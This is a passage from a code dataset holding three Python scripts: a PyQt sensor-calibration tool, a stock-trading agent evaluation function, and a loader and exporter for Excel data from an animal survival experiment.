QMessageBox.critical(self,u'error',u'输入参数文件表名不匹配')\n return 0\n self.node_split()\n self._check_enable()\n\n def opendatafile(self):\n u'''\n 读取数据文件,同时配合参数文件共同设置输出属性的able\n :return:\n '''\n data_path = self.lineEdit_2.text()\n self._check_enable()\n\n def _check_enable(self):\n u'''\n 检查输入框的文件是否存在,如果存在,则激活输出文件选项\n :return:\n '''\n data_path = self.lineEdit_2.text()\n if os.path.isfile(data_path):\n self._data_data = xlrd.open_workbook(data_path)\n if os.path.isfile(self.lineEdit.text()):\n self.pushButton_4.setEnabled(True)\n else:\n self.pushButton_4.setEnabled(False)\n\n def openSelect(self):\n u'''\n 打开selectSheet窗口,(与UI里面类似),并传递参数。\n :return:\n '''\n self.k_sheet = self._para_data.sheet_by_index(0)\n self.b_sheet = self._para_data.sheet_by_index(1)\n self.data_node_list = self._data_data.sheet_names()\n para_node_list_temp = self.k_sheet.col_values(0)\n para_node_list_temp2 = map(int,para_node_list_temp)\n self.para_node_list = map(str,para_node_list_temp2)\n node_list = [val for val in self.data_node_list if val in self.para_node_list]\n self.select = selectSheet.SelectWindow()\n self.select._get_namelist(node_list)\n self.select.enable_sheet(self._select_sheets)\n self.select.show()\n QtCore.QObject.connect(self.select.confirm, QtCore.SIGNAL(_fromUtf8(\"clicked()\")), self.name_list)\n\n def name_list(self):\n u'''\n 获取select页面的用户选择\n :return:\n '''\n self._select_sheets = self.select.confirm_selection()\n if self._select_sheets != []:\n self._get_range()\n self.pushButton_2.setEnabled(True)\n\n def enableButton(self):\n u'''\n 判断输出选项是否选择完全,如果是,则激活使得最下面的校准按钮\n :return:\n '''\n if self._select_sheets != []:\n self._get_range()\n self.pushButton_2.setEnabled(True)\n\n def _get_range(self):\n u'''\n 获得用户选择的输出通道\n :return:\n '''\n self.export_range = range(self.data_start, self.data_end + 1)\n\n def cal(self):\n u'''\n 计算每一列,将其存储在新文件中(存储各个列的相对位置,第一列在最开头)\n :return:\n '''\n file_path = QFileDialog.getSaveFileName(self, 'save file', \"saveFile\", \"excel files(*.xls)\")\n if file_path is u'':\n return 0\n channel_list = self.export_range\n\n prog_max = len(self._select_sheets) * len(channel_list) * self._data_data.sheet_by_name(u\"%s\"%self._select_sheets[0]).nrows + 10\n progdialog = QtGui.QProgressDialog(u\"计算中...\",u\"取消\",0,prog_max,self)\n progdialog.setWindowTitle(u\"计算进度\")\n progdialog.setWindowModality(QtCore.Qt.WindowModal)\n progdialog.show()\n prog_id = 0\n\n file = xlwt.Workbook()\n for i in range(len(self._select_sheets)):\n table = file.add_sheet(\"%s\"%self._select_sheets[i],cell_overwrite_ok=True)\n for j in channel_list:\n k,b = self.getPara(self._select_sheets[i],j)\n if k == u\"None\":\n continue\n if k == u'':\n continue\n ori_array = self.get_oriarray(self._select_sheets[i], j)\n try:\n cal_array = k * ori_array + b\n except:\n cal_array = np.array([])\n cal_list = cal_array.tolist()\n for k in range(len(cal_list)):\n table.write(k,j-self.data_start,cal_list[k])\n progdialog.setValue(prog_id)\n prog_id = prog_id + 1\n\n file.save(file_path)\n prog_id = prog_id + 10\n progdialog.setRange(0,prog_id)\n progdialog.setValue(prog_id)\n progdialog.accept()\n QMessageBox.information(self, u\"提示\", u\"操作成功!\")\n\n\n def getPara(self,node_name,range_j):\n u'''\n 读取相应结点相应通道和传感器的计算参数k和b\n :param node_name:\n :param range_j:\n :return:\n '''\n table_k = self._para_data.sheet_by_index(0)\n table_b = self._para_data.sheet_by_index(1)\n index = self.para_node_list.index(node_name)\n k = table_k.cell_value(index,range_j + 1 - self.data_start)\n b = table_b.cell_value(index,range_j + 1 - self.data_start)\n return k,b\n\n def get_oriarray(self,node_name,range_j):\n u'''\n 获取计算前数列\n :param node_name:\n :param range_j:\n :return:\n '''\n table = self._data_data.sheet_by_name(u\"%s\"%node_name)\n ori_list = table.col_values(range_j)\n '''\n if int(node_name) in self.node_1 :\n ori_list = table.col_values(range_j)\n elif int(node_name) in self.node_2_2 or int(node_name) in map(int, self.node_2_1):\n ori_1 = table.col_values(range_j)\n if range_j - self.data_start > self.column_2s_2:\n ori_2 = table.col_values(range_j - self.column_2s_1)\n else:\n ori_2 = table.col_values(range_j + self.column_2s_2)\n ori_list = self.getmax(ori_1,ori_2)\n '''\n ori_array = np.array(ori_list)\n return ori_array\n\n def getmax(self,list1,list2):\n u'''\n 暂时没用\n :param list1:\n :param list2:\n :return:\n '''\n list = []\n for i in range(len(list1)):\n if list1[i] >= list2[i]:\n list.append(list1[i])\n else:\n list.append(-30000)\n return list\n\n def get_parapath(self, para_path,data_path):\n u'''\n 如果该窗口通过UI窗口被调用,则运行该函数,获得UI窗口中用户已经输入的文件路径\n :param para_path:\n :param data_path:\n :return:\n '''\n if para_path is not u\"\":\n self.lineEdit.setText(u\"%s\" % para_path)\n self.openparafile()\n self.lineEdit_2.setText(u\"%s\" % data_path)\n self.opendatafile()\n\n def _readConfig(self):\n u'''\n 读取配置文件,说明读取数据表格的格式\n :return:\n '''\n file = open(\"config\\data_config.txt\", \"r\")\n line = \"start reading\"\n while (1):\n if (line == \"\"):\n break\n line = file.readline()\n split = line.strip().upper().split(\"=\")\n if split[0].strip() == \"DATA_START\":\n self.data_start = int(split[1].strip()) - 1\n if split[0].strip() == \"DATA_END\":\n self.data_end = int(split[1].strip()) - 1\n if split[0].strip().upper() == \"COLUMN_1S_1\":\n self.column_1s = int(split[1].strip())\n if split[0].strip().upper() == \"COLUMN_2S_1\":\n self.column_2s_1 = int(split[1].strip())\n if split[0].strip().upper() == \"COLUMN_2S_2\":\n self.column_2s_2 = int(split[1].strip())\n file.close()\n\n file = open(\"config\\\\2sides_config.txt\", \"r\")\n line = \"start reading\"\n while (1):\n if (line == \"\"):\n break\n line = file.readline()\n split = line.strip().upper().split(\"=\")\n if split[0].strip() == \"NODE_2S_1\":\n temp = split[1].strip().split(',')\n self.node_2_1 = temp\n file.close()\n\n element = []\n file = open(\"config\\export_config.txt\", \"r\")\n line = \"start reading\"\n while (1):\n if (line == \"\"):\n break\n line = file.readline()\n split = line.strip().split(\"=\")\n if split[0].strip().upper() == \"K\":\n element.append(split[1].strip())\n if split[0].strip().upper() == \"B\":\n element.append(split[1].strip())\n if split[0].strip().upper() == 'MSE':\n element.append(split[1].strip())\n if split[0].strip().upper() == 'R2':\n element.append(split[1].strip())\n file.close()\n\n if len(element) is not 0:\n return element\n else:\n QMessageBox.critical(u'error', u'error in reading the config')\n\n def node_split(self):\n u'''\n 获得各种类型的结点编号\n :return:\n '''\n k = self._para_data.sheet_by_name(self.element[1])\n node_1s = []\n node_2s_2 = []\n r = k.nrows\n for i in range(r):\n nodename = k.cell_value(i,0)\n row = k.row_values(i)\n if row.count('') == self.column_1s - self.column_1s:\n node_1s.append(nodename)\n elif row.count('') == self.column_2s_2:\n node_2s_2.append(nodename)\n\n self.node_1 = node_1s\n self.node_2_2 = node_2s_2\n\n\n","repo_name":"lyobo/Sensor-calibration","sub_path":"project/cal.py","file_name":"cal.py","file_ext":"py","file_size_in_byte":10969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"73675734347","text":"import os\nimport logging\nimport math\nimport numpy as np\n\nfrom utils import get_state\nfrom utils import format_1, format_2\n\n\ndef evaluate_model(agent, data, window_size, debug):\n \"\"\"\n Arguments:\n agent: the agent.\n data: the data used to evaluate the model.\n window_size (int): the number of time units taken into account to do a prediction.\n debug (bool): controls whether or not to debug.\n Returns:\n a tuple of length 2 consisting of total profit and trading history.\n total profit is a float.\n trading history is an array of price-action pairs.\n an action is one of the strings \"BUY\", \"SELL\", or \"HOLD\".\n \"\"\"\n\n total_profit = 0\n\n history = []\n agent.inventory = []\n\n state = get_state(data, 0, window_size + 1)\n data_length = len(data) - 1\n\n for t in range(data_length):\n reward = 0\n next_state = get_state(data, t + 1, window_size + 1)\n\n action = agent.act(state, is_eval=True)\n\n if action == 1:\n agent.inventory.append(data[t])\n\n history.append((data[t][0], \"BUY\"))\n if debug:\n logging.debug(\"Buy at: {}\".format(format_1(data[t][0])))\n\n elif action == 2 and len(agent.inventory) > 0:\n bought_price = agent.inventory.pop(0)\n delta = data[t][0] - bought_price[0]\n reward = delta\n reward = 100*(delta/bought_price[0])\n total_profit += delta\n\n history.append((data[t][0], \"SELL\"))\n if debug:\n logging.debug(\"Sell at: {} | Position: {}\".format(\n format_1(data[t][0]), format_2(data[t][0] - bought_price[0])))\n\n else:\n history.append((data[t][0], \"HOLD\"))\n if debug:\n logging.debug(\"Hold at: {}\".format(format_1(data[t][0])))\n\n agent.memory.remember(state, action, reward,\n next_state, (t == data_length - 1))\n state = next_state\n\n return {\n 'total profit': total_profit,\n 'trading history': np.array(history),\n }\n","repo_name":"Kevinht2010/stock-trader","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"11602147035","text":"\"\"\"\"\nThis file loads the excel data from the survival HS/TBI experiment. It parses the Excel sheet into a dataframe and has\noutput functions, subselection functions and plotting functions that should be general enough to use conversationally.\nMatt Maggio\n4/12/19\n\nThis file has grown signficantly since I started it. It now houses a lot of functionality related to the SA-1 Experiments.\nNeed to possibly break this file out into a class calling the loader functions here.\n6/7/19\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xlsxwriter as xlwrite\nimport time, re, datetime, winsound\nimport lifelines, sys, pdb\nimport SA1DataManipulation\nimport pickle\nimport os\n\n\ndef Parse_excel(path=None, Experiment_lst = [\"2018124\"]):\n #There were many formating decisions made to make the sheet more human readable.\n #basically this function is gathering the data back into a machine readable form.\n #Output is going to be a dict for each experiment that has key value pairs and pd.series of data as outputs.\n #later I think I can pile all of this into a giant dataframe or I can have a subselection function to go through and pull the data I need using a loop.\n\n\n xls = pd.ExcelFile(path)\n df = pd.read_excel(xls, sheet_name=Experiment_lst, header= None)\n\n Output_lst = []\n\n #Iterate through all the sheets, get the sheet as a dataframe, reformating until it's sensible.\n for exp in Experiment_lst:\n print(\"Loading experiment {0}\".format(exp))\n t1 = time.time()\n df_exp = df[exp]\n #Get the Unique var names\n slice_lst = [slice(3,21), slice(23,30)]\n UVar = pd.concat([df_exp.iloc[slice_lst[0],1], df_exp.iloc[slice_lst[1],1]])\n UVar = Drop_units(UVar) # Shorten the names to take the units out.\n UVal = pd.concat([df_exp.iloc[slice_lst[0],4], df_exp.iloc[slice_lst[1],4]])\n Udict = dict(zip(UVar, UVal))\n\n\n\n # Time values are known a priori\n Time = np.concatenate([np.arange(0, 20, 5), np.arange(30, 240+15, 15), np.arange(8 * 60, (72+4) * 60, 4 * 60)])\n\n # Special one off to get the hespand delievered in a time resolved manner.\n HesDelivered = df_exp.iloc[19, slice(5, 6 + 35)]\n\n\n #Get the Repeditive var names and data. Similar to above.\n indexX = [slice(33,63), slice(64, 74), slice(86, 104), slice(105, 123), slice(128, 137), slice(138, 147), slice(158, 179), slice(180, 197) ]\n indexY = slice(5, 41)\n\n RVar = list()\n RVal = list()\n for i in range(0,len(indexX)): #Run a loop to make this less verbose\n RVar.append(df_exp.iloc[indexX[i], 1])\n RVal.append(df_exp.iloc[indexX[i], indexY])\n RVar = pd.concat(RVar, axis=0)\n RVar = Drop_units(RVar) # Shorten the names to take the units out.\n RVal = pd.concat(RVal, axis=0)\n\n RDict = dict()\n #Loop through RVar, adding key and value pairs adding the series to the dict\n for index, key in enumerate(RVar):\n RDict[key] = RVal.iloc[index, :]\n\n ExpDict = {**Udict, **RDict}\n #Add a few more fields and then stack up into a list to complete the experiment loading\n ExpDict[\"experimentNumber\"] = exp\n ExpDict[\"Time\"] = Time\n ExpDict['HESDelivered'] = HesDelivered\n # print(\"Experiment {0} Loaded and Parsed taking {1}\".format(exp, time.time()-t1))\n Output_lst.append(ExpDict)\n print(\"done\")\n\n return Output_lst\n\ndef Drop_units(series):\n #Remove everthing that is between (), remove all commas\n #Learning regex. Be Gentle.\n output = list()\n for entry in series:\n # Find text between () that matches either OPTI or AVOX, it appears that we are overwriting some fields.\n TechniqueLst = ['(OPTI)', '(AVOX)', '(OPTI ELYTE)']\n Technique = re.search( '\\(.*?\\)', entry) #A match object for the first matching between pattern and the entry.\n\n entry = re.sub('\\(.*?\\)','', entry)#Remove all text between ()'s\n entry = re.sub(r',',' ', entry) #Remove commas replace with white space\n entry = re.sub(r'\\s\\s+', ' ', entry) # Remove double white space\n if not Technique is None:\n if Technique.group(0) in TechniqueLst:\n # print('adding in the tech ()' + Technique.group(0) )\n output.append(entry.strip()+' '+ Technique.group(0) )\n else:\n output.append(entry.strip())\n else:\n output.append(entry.strip())\n # print(entry)\n return pd.Series(output)\n\ndef Randomize_groups(Dataset):\n #This function should only be used to randomly assign groups to the data before the code has been broken and to test other code.\n Group_original = [\"A\", \"B\", \"C\", \"D\"]\n Group = Group_original.copy() #Draw each group with replacement\n for exp in Dataset:\n if exp[\"Intervention\"] == \"XXX\":\n exp[\"Intervention\"] = np.random.choice(Group)\n Group.remove(exp[\"Intervention\"])\n if len(Group) == 0: #If we have drawn all 4 groups, replace for the next loop.\n Group = Group_original.copy()\n #return Dataset #Intentionally broken to prevent dumb mistakes.\n\n\ndef selectData(Dataset, Key = 'Ao systolic', KeyType = None, groupBy = 'Intervention', returnForm = 'array'):\n #This function should iterate through all the data in the list and subselect the key of intrest and return it.\n #Organize by group, and then return a list of the data by group. If groupby is a key and not None then attempt to group by the ordinal values suggested by the input.\n #this should work on blocks for example. If averageGroups is False we will return a dataframe instead of a series.\n #Key should be a list of the fields you are intrested in. We will return a list of the same size as Key containing the data either as a series for each group.\n #TODO Start with a single Key. Eventually it would be SWEET to take Key as a list and call this function recursively!\n #Clarifying the output. We need to have a dict output. [Group A: Data A, Group B: Data B, Group C: Data C] Groups should either be dataframes or series depending on requested output\n #Dataframe seems like a bad fit here. Resorting to np.array().\n\n #returnForm has 3 accepted values.\n # 'means' means give just the mean value,\n # 'array' means give back a numpy array that the user can do w/e with.\n # 'standardError' is give back the standard error of each time point within the dataset.\n # 'N' is give back the length of the array along the dim.\n\n groupNames = []\n data = dict()\n\n #If user doesn't spesifcy a type we should expect the data to be we have to check on one of the experiments to find the type it is.\n # if KeyType == None:\n # sample = Dataset[1][Key]\n # samplenotnana = np.invert(np.isnan(sample))\n # # KeyType = type(sample.iloc[sampleIdx[]])\n\n for exp in Dataset:\n if not exp[groupBy] in groupNames: # if our treatment group hasn't been seen yet, add it.\n groupNames.append(exp[groupBy]) #Add to group name since we haven't seen it before whatever type it is doesn't matter. y/n, int, catag\n data[str((exp[groupBy]))] = [] # Create an empty list to placehold for the array.\n # print(groupNames)\n # print(str(exp['Intervention']) , ' ', str(exp[Key]) )\n data[str((exp[groupBy]))].append(exp[Key]) #Add the data by appending it to the list that is the value of the dict.\n\n\n\n try:\n for group in data.keys():\n #Let numpy Cast the data into an array.\n data[group] = np.array(data[group], dtype=np.float64) #Failure here means we shouldn't output anything. No number\n if returnForm == 'means':\n #return means across the experiments.\n data[group] = np.nanmean(data[group], axis=0)\n elif returnForm == 'N':\n #return the counts of observations across the group.\n data[group] = np.sum(np.invert(np.isnan(data[group])), axis=0)\n elif returnForm == 'standardError':\n #Return the standard error of the mean. Sample std means ddof=1 for nanstd\n data[group] = np.nanstd(data[group], axis=0,ddof=1) / np.sqrt(np.sum(np.invert(np.isnan(data[group])), axis=0))\n return data #Send out the array if user doesn't want other ways of display.\n except:\n print('Data could not be accessed correctly.')\n return None\n\n\ndef BoxPlot(Data):\n #Call with preselected data using select data function, The returnLists param should be set to True\n fig1, ax1 = plt.subplots()\n boxes = []\n for key in Data.keys(): #Add other types and sizes of data for sensible plotting.\n if isinstance(Data[key][0], datetime.time):\n box = []\n for point in Data[key]:\n box.append((point.hour*60) + point.minute)\n boxes.append(box)\n ax1.boxplot(boxes)\n return (fig1, ax1) # This is a plotting function, so it returns the plot objects.\n\n\n\n\ndef LinearPlot(Data, xData, ylabel, averageGroups= False, Groups = None ):\n # Groups = [\"A\"] #Test code, remove If groups is == None use all the keys in the dict as the groups\n color_lst = ['blue', 'purple', 'red', 'green', 'cyan']\n fig, (ax, ax2) = plt.subplots(1, 2, sharey=True, facecolor='w')\n plt.title(\"Group {0} vs Time\".format(str(Groups)))\n if Groups == None:\n Groups = Data.keys()\n for index, group in enumerate(Groups):\n for exp in Data[group]:\n if not len(Groups) == 1: #If more than one group is plotted, keep colors the same per group.\n ax.plot(xData, exp, color=color_lst[index])\n ax2.plot(xData, exp, color=color_lst[index])\n else:\n ax.plot(xData,exp)\n ax2.plot(xData,exp)\n #This is just complex plotting code to make the xscaling work.\n ax.set_xlim(0, 240)\n ax2.set_xlim(240 + (3*60), 72*60)\n ax.spines['right'].set_visible(False)\n ax2.spines['left'].set_visible(False)\n ax.yaxis.tick_left()\n ax.tick_params(labelright='off')\n ax2.yaxis.tick_right()\n d = .015\n #This stuff I don't understand. Some clever guy on stack overflow is getting credit for it. https://stackoverflow.com/questions/32185411/break-in-x-axis-of-matplotlib/32186074#32186074\n #TODO Consider this package: https://github.com/bendichter/brokenaxes\n kwargs = dict(transform=ax.transAxes, color='k', clip_on=False)\n ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)\n ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)\n kwargs.update(transform=ax2.transAxes) # switch to the bottom axes\n ax2.plot((-d, +d), (1 - d, 1 + d), **kwargs)\n ax2.plot((-d, +d), (-d, +d), **kwargs)\n plt.xlabel(\"Time (min)\") #TODO Usually true. Work on this later\n # ax.set_xticks(xData) #TODO Cut the distance between points in the survival phase so we get equal weights.\n # ax.set_xticklabels(xData)\n ax2.ylabel(ylabel)\n return (fig, (ax, ax2)) # This is a plotting function, so it returns the plot objects.\n\ndef survivalPlot(Dataset=None): #TODO Implement.\n\n from lifelines.datasets import load_waltons\n from lifelines.statistics import logrank_test\n import distutils\n if Dataset == None: #Test data\n df = load_waltons() # returns a Pandas DataFrame\n groups = df['group']\n Treatment = 'miR-137'\n print(df.head())\n else:\n #Collect the survival data and groups in a manner similar to above\n # Survival time\n # Survival 240 minutes\n # Survival 72 hours\n Event = selectData(Dataset, Key='Survival 72 hours', returnLists=True)\n Event = [distutils.util.strtobool(e) for e in Event] #FIX THIS\n Time = selectData(Dataset, Key='Survival time', returnLists=False )\n Groups = Event.keys()\n (Earray, Tarray, Garray) = (np.empty(0), np.empty(0), np.empty(0))\n for group in Groups:\n Earray = np.concatenate(Earray, Event[group])\n Tarray = np.concatenate(Tarray, Time[group])\n Garray = np.concatenate(Garray, np.array(((str(group)+' ')*len(Event[group]).split(' '))))\n df = pd.DataFrame({'E':Earray, 'T':Tarray,'groups': Garray})\n print(df)\n \"\"\"\n T E group\n 0 6 1 miR-137\n 1 13 1 miR-137\n 2 13 1 miR-137\n 3 13 1 miR-137\n 4 19 1 miR-137\n \"\"\"\n\n T = df['T']\n E = df['E']\n ix = (groups == Treatment)\n\n kmf = lifelines.KaplanMeierFitter()\n kmf.fit(T, event_observed=E) # or, more succinctly, kmf.fit(T, E)\n kmf.survival_function_\n kmf.cumulative_density_\n kmf.median_\n res = logrank_test(T[~ix], T[ix], E[~ix], E[ix], alpha=0.99)\n res.print_summary()\n kmf.plot_survival_function()\n\n # kmf.plot_cumulative_density()\n\n # groups = df['group']\n # ix = (groups == 'miR-137')\n #\n # kmf.fit(T[~ix], E[~ix], label='control')\n # ax = kmf.plot()\n #\n # kmf.fit(T[ix], E[ix], label='miR-137')\n # ax = kmf.plot(ax=ax)\ndef cloneStringToList(string, N):\n lst = ((string + ',') *N).split(',')\n lst.pop(-1)\n return lst\n\ndef DateTimesToStr(Dataset = None):\n #This function is simple, it changes datatimes to simple strings to export to other programs, If they are ever important we can modify this.\n for exp in Dataset:\n for field in exp.keys():\n data = exp[field]\n # print(type(data))\n if type(data) == type(datetime.datetime.now()):\n # print('found a datetime obj ' + field + ' of type '+ str(type(data)))\n exp[field] = str(data.strftime('%d/%m/%Y %H:%M:%S')) #Cast into a string var\n elif type(data) == type(datetime.time()):\n # print('found a datetime obj ' + field + ' of type '+ str(type(data)))\n exp[field] = str(data.strftime('%H:%M:%S')) #Cast into a string var\n return Dataset\n\ndef SPSSExport(Dataset = None):\n #Export all data to SPSS form, for repeated measurements they must be broken out into rows such that each animal and timepoint has a row or case.\n #Initially it was unclear which varibles need to be repeated in each case belonging to an animal, The basic survival and mixed models can be run only copying\n #The experiment number and Intervention so that each animal and group can be kept distinct. According to Dr.Miller, to use the cox proportional hazard model, the covariate needs to be copied into each case row for each animal.\n #Now this isn't a huge deal, but considering that we want to extract each of the baseline values for use as a fixed factor or predictive of surival, it is going to lead to a huge inflation of the spss dataset.\n #\n outpath = r'C:\\Users\\mattm\\PycharmProjects\\GazmuriDataLoader\\Export\\\\'\n path = outpath + 'SPSSExport.xlsx'\n workbook = xlwrite.Workbook(path, {'nan_inf_to_errors': True})\n worksheet = workbook.add_worksheet()\n\n #Get all fields from the first dataset.\n fields = Dataset[0].keys()\n\n #Use the groups in the same order as the other export functions.\n groups = ['NS', 'TLP', 'POV', 'AVP']\n\n # # Develop a list of interventions. More general, don't control the order though.\n # groups = list(selectData(Dataset).keys())\n # # Develop a dict that has the indexes as a list for each group.\n # groupIdx = {key: [] for key in groups}\n # for idx, data in enumerate(Dataset):\n # groupIdx[str(data['Intervention'])].append(idx)\n\n # Write ALL the headers\n repeatFields = ['Time', 'experimentNumber', 'Intervention', 'Block']\n for idx, field in enumerate(repeatFields): # Write the repeated fields as headers\n worksheet.write(0, idx, field)\n\n (row, col) = (1, 0) # Where to start counting from for the data, if you are going to have repeats like time and exp num they have to be factored in.\n\n # exp = Dataset[3] #Start with 2018107\n for ix, expReal in enumerate(Dataset):\n\n exp = expReal.copy() #Apparently pop removes it from the actual object in memory. LAME but nessasary.\n\n if ix == 0:\n for idx, field in enumerate(fields): # Write the rest of the headers fields as headers\n worksheet.write(0, idx+len(repeatFields), field)\n\n #Format the repeating fields here. #Make this a loop, for now just add reapeat fields here one at a time. turns out this isn't super nessasary, kinda nice to have these first though.\n Time = exp['Time']\n expNum = cloneStringToList(exp['experimentNumber'], len(Time))\n intervention = cloneStringToList(exp['Intervention'], len(Time))\n Block = cloneStringToList(str(exp['Block']), len(Time))\n array = list((Time, expNum, intervention, Block))\n\n for field in repeatFields: #Repeat fields should be popped from the experiment dict so we don't have duplicates.\n exp.pop(field)\n\n fields = exp.keys() #Re get the keys after we remove the repeat headers.\n if ix == 0: #Only on the first experiment are we worried about headers.\n for idx, field in enumerate(fields): # Write the rest of the headers fields as headers\n worksheet.write(0, idx+len(repeatFields), field)\n\n fields = exp.keys()\n for idx, field in enumerate(fields):\n if type(exp[field]) == type(float()): #For all single measurements, turn them into repeating measurements here.\n array.append(cloneStringToList(str(round(exp[field],2)), len(Time)))\n elif not type(exp[field]) == type(pd.Series()):\n array.append(cloneStringToList(str(exp[field]),len(Time)))\n else:\n array.append(exp[field])\n\n #lets just get an array of the values and do a write_col at the end.\n for col, data in enumerate(array):\n # print(type(data))\n if isinstance(data, (type(pd.Series()), type(list()), type(np.array(1)))):\n worksheet.write_column(row, col, data)\n else:\n worksheet.write(row, col, data)\n row += len(Time)\n\n workbook.close()\n #Reload the data into a pandas dataframe and then replace the nans. This is much easier than trying to figure out if a nan is going to print. GOOD CLUGE\n df = pd.read_excel(path)\n df.to_excel(path)\n\n\ndef SigmaPlotExport(Dataset=None):\n outpath = r'C:\\Users\\mattm\\PycharmProjects\\GazmuriDataLoader\\Export\\\\'\n path = outpath + 'SigmaPlotExport.xlsx'\n workbook = xlwrite.Workbook(path, {'nan_inf_to_errors': True})\n worksheet = workbook.add_worksheet()\n\n #\n\n #7/22/2019 Finally got the format that Dr.G wants for the sigmaplot data.\n #He wants the time, mean of a group, SEM of a group, n of a group, repeat for all groups. Do not include time points that are nans.\n\n (Row, Col) = (0,0)\n\n groups = ['NS', 'TLP', 'POV', 'AVP'] #Dr.G made a totally arbitrary desision, but it important to remain consistant.\n\n # Arbitrary = selectData(Dataset)\n # groups = Arbitrary.keys()\n\n #TODO Export the data for survival anaylsis first.\n\n Col += 2\n\n # Export the HES admin datax\n Time = Dataset[0]['Time']\n DoseRatio = SA1DataManipulation.ResolvedHESAdministration(Dataset, output='ratio', graph = False)\n DoseRatioN = SA1DataManipulation.ResolvedHESAdministration(Dataset, output='possibleDoses', graph = False)\n CheckTimes = [30, 120, 240, 8 * 60, 12 * 60, 16 * 60, 20 * 60, 24 * 60]\n worksheet.write_string(row=Row, col=Col, string=('Time'))\n worksheet.write_column(row=Row + 1, col=Col, data=CheckTimes)\n\n Bothsets = set(CheckTimes).intersection(Time)\n indices = [list(Time).index(x) for x in Bothsets]\n Col += 1\n for group in groups:\n worksheet.write_string(row=Row, col=Col, string=('HES ratio ' + '-' + group ))\n worksheet.write_column(row=Row + 1, col=Col, data=DoseRatio[group][sorted(indices)])\n worksheet.write_string(row=Row, col=Col + 1, string=('BLANK ' + '-' + group ))\n worksheet.write_column(row=Row + 1, col=Col + 1, data=[])\n worksheet.write_string(row=Row, col=Col + 2, string=('HES doses possible' + '-' + group + ' N'))\n worksheet.write_column(row=Row + 1, col=Col + 2, data=DoseRatioN[group][sorted(indices)])\n Col += 3\n Col += 1\n\n #Export the data from the rest of the fields. from the groups in order.\n for field in Dataset[0].keys():\n means = selectData(Dataset, Key=field, returnForm='means')\n N = selectData(Dataset, Key=field, returnForm='N')\n stdErr = selectData(Dataset, Key=field, returnForm='standardError')\n\n if means is not None:\n BoolArray = np.invert(np.isnan(means[groups[3]]))\n if len(BoolArray.shape) == 0:\n #Write out the single value field.\n continue #Skip for now.\n else:\n Time = Dataset[0]['Time']\n #write time gap, time, list the field, then go through the groups\n Col += 1 #Gap column\n worksheet.write_string(row=Row, col=Col, string='Time (min)')\n worksheet.write_column(row=Row+1, col=Col, data=Time[BoolArray])\n worksheet.write_string(row=Row, col=Col+1, string=field)\n Col += 2\n\n for group in groups:\n worksheet.write_string(row=Row, col=Col, string=(field + '-' + group +' means' ))\n worksheet.write_column(row=Row+1, col=Col, data=means[group][BoolArray])\n worksheet.write_string(row=Row, col=Col + 1, string=(field + '-' + group + ' StdError'))\n worksheet.write_column(row=Row+1, col=Col+1, data=stdErr[group][BoolArray])\n worksheet.write_string(row=Row, col=Col+2, string=(field + '-' + group + ' N'))\n worksheet.write_column(row=Row+1, col=Col+2, data=N[group][BoolArray])\n Col += 3\n # TODO Export the Neurological test data last, some reformatting is required.\n\n\n workbook.close()\n\n\n #See above, this was a first attempt I'll clean up when I have a working version.\n # # Write ALL the headers\n # # repeatFields = ['Time'] #Other repeated cols don't make sense here Unless i'm bad at sigma plot. I probably am.\n # Time = Dataset[0]['Time']\n # (row, col) = (1, 0)\n # Fields = ['Ao systolic', 'Ao systolic','Heart rate LV', 'ICP']\n # # exp = Dataset[3] #2018107 for testing. #silly me, I can't go exp by exp because I need summary stats.\n #\n # array = np.empty(len(Time)*4, 1+(2*len(Fields))) * np.nan #Take that 4 out of there.\n #\n # for ix, field in enumerate(Fields):\n # Data = selectData(Dataset, Key=field, returnLists=False)\n # #Average across group. Then stack them and write the entire column out #Get the standard error too for error bars.\n # Groups=[]\n # Times=[]\n # for group in Data.keys():\n # if ix == 0: #First field we have to do all the groups in one col, all the times in another and all the data in the third.\n # intervention = (cloneStringToList(group, len(Time))) #append the treatment group to the list first.\n # data = np.nanmean(Data[group], 0)\n # stdev = np.nanstd(Data[group], 0)/ Data['A'].shape[0]\n # # array[0:] # and then on not the first field we do the same thing with the rest of the averaged data.\n #\n #\n # #lets just get an array of the values and do a write_col at the end.\n # for col, data in enumerate(array):\n # worksheet.write_column(row, col, data)\n #\n # workbook.close()\n\ndef DescriptivesExportLinked(Dataset): #TODO Dr.G wants descriptives that are interactive so if you change the sheet it will update the sumarry table and summarry stats.\n pass\n\n\ndef DescriptivesExport(Dataset, OutName = None, groups = ['NS', 'TLP', 'POV', 'AVP']):\n #Dr.G Likes to visually page through the data to look for outliers and strange values.\n #He uses a copy and paste macro I can't replicate. This should work though.\n outpath = r'C:\\Users\\mattm\\PycharmProjects\\GazmuriDataLoader\\Export\\\\'\n if OutName == None:\n workbook = xlwrite.Workbook(outpath + 'Descriptives.xlsx', {'nan_inf_to_errors': False})\n else:\n workbook = xlwrite.Workbook(outpath + OutName + '.xlsx', {'nan_inf_to_errors': False})\n worksheet = workbook.add_worksheet()\n #Add formats here\n FormulaFormat = workbook.add_format({'bold': True, 'border': 1, 'bg_color': '#FFA500'})\n FieldFormat = workbook.add_format({'text_wrap': True })\n #Row, colunm, data\n # worksheet.write(0, 2, \"TEst test yo world\")\n\n #Get all fields from the first dataset.\n fields = list(Dataset[0].keys())\n\n #Develop a list of interventions.\n\n # groups = list(selectData(Dataset).keys())\n # groups.sort() #Sort alphabetical. might change when we unblind. TODO.\n TypeList = []\n if groups == None:\n #If no groups data given, figure it ouut. by getting a list of unique groups.\n groups = []\n for exp in Dataset:\n if exp['Intervention'] not in groups:\n groups.append(exp['Intervention'])\n\n #Develop a dict that has the indexes as a list for each group.\n groupIdx = {key: [] for key in groups}\n for idx, data in enumerate(Dataset):\n groupIdx[str(data['Intervention'])].append(idx)\n\n (row, col) = (0, 0) #Where to start counting from.\n\n for index, field in enumerate(fields):\n if field == 'Time':\n continue\n\n if index == 0: # write the first 2 columns that Dr.G has set up.\n GetTime = Dataset[0]['Time']\n\n col2a = np.concatenate((np.arange(0, 15 + 5, 5), np.arange(30, 240 + 15, 15)))\n col2b = np.arange(8, 72 + 4, 4)\n col1 = (r'Exp.#,Intervention,General,BL,' + 